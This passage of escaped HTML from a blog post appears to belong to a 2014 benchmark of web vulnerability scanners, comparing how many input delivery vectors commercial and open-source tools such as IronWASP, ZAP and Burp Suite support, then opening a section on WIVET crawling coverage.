&lt;span style=&quot;color: white;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;IronWASP&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  input delivery method scope selection in scan wizard:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkD1JniVhndEVvCRlLp5Z0wyfdxEh74-9T5xZgXxdwvItZkgmSwDyaRwASMnFfV9iA73jN4682o_UkwRFYGb4FIbvkyvr-SxpxMCPQdcRc-emIuV_BJjhhO7-oJ56zPJB5z3qW_mGNj34/s1600/5%2529+IronWASP+Input+Vectors+Mng.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkD1JniVhndEVvCRlLp5Z0wyfdxEh74-9T5xZgXxdwvItZkgmSwDyaRwASMnFfV9iA73jN4682o_UkwRFYGb4FIbvkyvr-SxpxMCPQdcRc-emIuV_BJjhhO7-oJ56zPJB5z3qW_mGNj34/s1600/5%2529+IronWASP+Input+Vectors+Mng.png&quot; height=&quot;187&quot; width=&quot;400&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;!--[if gte vml 1]&gt;&lt;v:shape
   id=&quot;_x0000_i1027&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:195pt&#39;
   o:ole=&quot;&quot;&gt;
   &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image011.png&quot;
    o:title=&quot;&quot;/&gt;
  &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin;&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
   &lt;o:OLEObject Type=&quot;Embed&quot; ProgID=&quot;PBrush&quot; ShapeID=&quot;_x0000_i1027&quot;
    DrawAspect=&quot;Content&quot; ObjectID=&quot;_1453177925&quot;&gt;
   &lt;/o:OLEObject&gt;
  &lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;OWASP &lt;b&gt;ZAP&lt;/b&gt; input delivery method scope selection in the
  configuration window:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii51a8LVqe3POuZNtgUccswXSOoIEKkeARYFMRaeFa7DjexjjupHTMAv94d-cA3CVbPcGaRTnV7ny11kphZLentkelxYvQ2xLqljRMqkhMjjCZPKCrS55mwYVwWRltrhqqOQFxUoqUrAo/s1600/6%2529+ZAP+Input+Vectors+Mng.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii51a8LVqe3POuZNtgUccswXSOoIEKkeARYFMRaeFa7DjexjjupHTMAv94d-cA3CVbPcGaRTnV7ny11kphZLentkelxYvQ2xLqljRMqkhMjjCZPKCrS55mwYVwWRltrhqqOQFxUoqUrAo/s1600/6%2529+ZAP+Input+Vectors+Mng.png&quot; height=&quot;84&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;!--[if gte vml 1]&gt;&lt;v:shape
   id=&quot;_x0000_i1028&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:408pt;height:108pt&#39; o:ole=&quot;&quot;&gt;
   &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image013.png&quot;
    o:title=&quot;&quot;/&gt;
  &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin;&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
   &lt;o:OLEObject Type=&quot;Embed&quot; ProgID=&quot;PBrush&quot; ShapeID=&quot;_x0000_i1028&quot;
    DrawAspect=&quot;Content&quot; ObjectID=&quot;_1453177926&quot;&gt;
   &lt;/o:OLEObject&gt;
  &lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Similar features were verified in &lt;b&gt;Burp Suite Pro&lt;/b&gt;,
  and may exist in other products as well.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The more vectors of input delivery that the scanner
supports, the more versatile it is in scanning different technologies and
applications (assuming it can handle the relevant scan barriers, supports
necessary features such as authentication, or alternatively, contains features
that can be used to work around the specific limitations).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The detailed comparison of the scanners support for various
input delivery methods is documented in detail in the following section of
sectoolmarket: &lt;/span&gt;&lt;a href=&quot;http://www.sectoolmarket.com/input-vector-support-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://www.sectoolmarket.com/input-vector-support-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following charts shows how versatile each scanner is in
scanning different input delivery vectors (and although not entirely comprehensive
- different technologies):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;i style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 16px;&quot;&gt;&lt;u style=&quot;font-weight: bold;&quot;&gt;Result Update (29/03/2014):&lt;/u&gt; Appscan, ZAP and arachni reported support for additional input vectors AFTER the original benchmark publication (in the same tested versions). The current charts include these updates, alongside others.&lt;/i&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Number of Input Vectors Supported – Commercial Tools &amp;amp; SAAS&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKW9m4JxfnKKJNmnYOF9-ZjGXjMK79P6-GnfqkjNZVnGgrWU2rBxTHMGZQGkhkF6mec2RdyVN9KvE4Dj8a-yRCAD8ghcu9sPLolNy_jJAXoB6dCYhrT14n5xltKf4YsRiIP8Vgw-9KlBs/s1600/InputVectorSupport-wavsep-results-2014-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKW9m4JxfnKKJNmnYOF9-ZjGXjMK79P6-GnfqkjNZVnGgrWU2rBxTHMGZQGkhkF6mec2RdyVN9KvE4Dj8a-yRCAD8ghcu9sPLolNy_jJAXoB6dCYhrT14n5xltKf4YsRiIP8Vgw-9KlBs/s1600/InputVectorSupport-wavsep-results-2014-commercial.png&quot; height=&quot;214&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Number of Input Vectors Supported&amp;nbsp;– Free &amp;amp; Open
Source Tools&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE06v8SvA3PNAZlAj1lXe6IKX_KtFqbzYrxkBYAfd91XY9jWYEEaMoK_ymGWnEmrzatzgAfCNKtiiOX22Ju8JDtX2XFBbHx1prXPH6Z7SM0fO_TggVxGHZ5zmezF5Du50g0CCnOWAPMDk/s1600/InputVectorSupport-wavsep-results-2014-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE06v8SvA3PNAZlAj1lXe6IKX_KtFqbzYrxkBYAfd91XY9jWYEEaMoK_ymGWnEmrzatzgAfCNKtiiOX22Ju8JDtX2XFBbHx1prXPH6Z7SM0fO_TggVxGHZ5zmezF5Du50g0CCnOWAPMDk/s1600/InputVectorSupport-wavsep-results-2014-opensource.png&quot; height=&quot;512&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Number of Input Vectors Supported&amp;nbsp;– Unified List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2IyBp6wWDMixqYUIQWM9VhqQENslvoSjBPGPWPeRpjR2mu4-OQeKtOj9kEEKDBPSZ35csX_rAfm7h64rsVjg2nLby0up96XMhwya58ysJiAhoH7HrlakNMvM0nn7EVOSvj_dsXCRl-IM/s1600/InputVectorSupport-wavsep-results-2014-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2IyBp6wWDMixqYUIQWM9VhqQENslvoSjBPGPWPeRpjR2mu4-OQeKtOj9kEEKDBPSZ35csX_rAfm7h64rsVjg2nLby0up96XMhwya58ysJiAhoH7HrlakNMvM0nn7EVOSvj_dsXCRl-IM/s1600/InputVectorSupport-wavsep-results-2014-unified.png&quot; height=&quot;592&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_41&quot;
 o:spid=&quot;_x0000_i1057&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:415.5pt;height:371.25pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image019.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Versatility of Open Source Scanners vs. Commercial Scanners in
2014&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The vast majority of open source tools tested in 2012 (with
the exception of IronWASP) did not support vectors besides the basic
GET/POST/Header/Cookie vectors, making the task of using them against &quot;modern&quot;
applications that rely on JSON/XML/etc impractical.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;However, as the graph proves, certain open source vendors
invested efforts in supporting additional input delivery methods in their
vulnerability scanning features, and thus, these scanners can be used effectively
against applications with &quot;modern&quot; input vectors and technologies.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although this scenario is rare, and by no means
representative, the careful inspector will even &lt;a href=&quot;http://www.sectoolmarket.com/input-vector-support-unified-list.html&quot;&gt;identify&lt;/a&gt;
input delivery methods that are &lt;b&gt;only&lt;/b&gt; supported by certain open source
projects (for example, ZAPs support for GWT), although the same goes the other
way around for many vectors supported by commercial vendors .&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;8. Test II - WIVET - Crawling Coverage&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The second assessment criterion was focused on assessing &lt;b&gt;crawling
coverage&lt;/b&gt; features, which included the various &lt;b&gt;discovery&lt;/b&gt; methods used
to &lt;b&gt;increase the attack surface&lt;/b&gt; of the tested application: to locate
additional resources and input delivery methods to attack. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although scanners can increase the attack surface in a number
of ways, from detecting hidden files to exposing device-specific interfaces
(mobile, tablet, etc), this assessment was focused at assessing the &lt;b&gt;automated
crawling capabilities&lt;/b&gt; and &lt;b&gt;input vector&lt;/b&gt; &lt;b&gt;extraction &lt;/b&gt;coverage
(as &lt;b&gt;opposed&lt;/b&gt; to &lt;b&gt;&lt;i&gt;input vector scanning&lt;/i&gt;&lt;/b&gt; support measured in
the previous section) of the various scanners, and is primarily represented
using the scanner&#39;s &lt;b&gt;WIVET&lt;/b&gt; score.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;This aspect of a scanner is extremely important in
point-and-shoot scans, scans in which the user does not &quot;train&quot; the
scanner to recognize the application structure, URLs and requests, either due
to time/methodology restrictions, or when the user is not a security expert
that knows how to properly use manual crawling with the scanner. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #000000; border-collapse: collapse; border: none; mso-background-themecolor: accent1; mso-background-themetint: 102; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
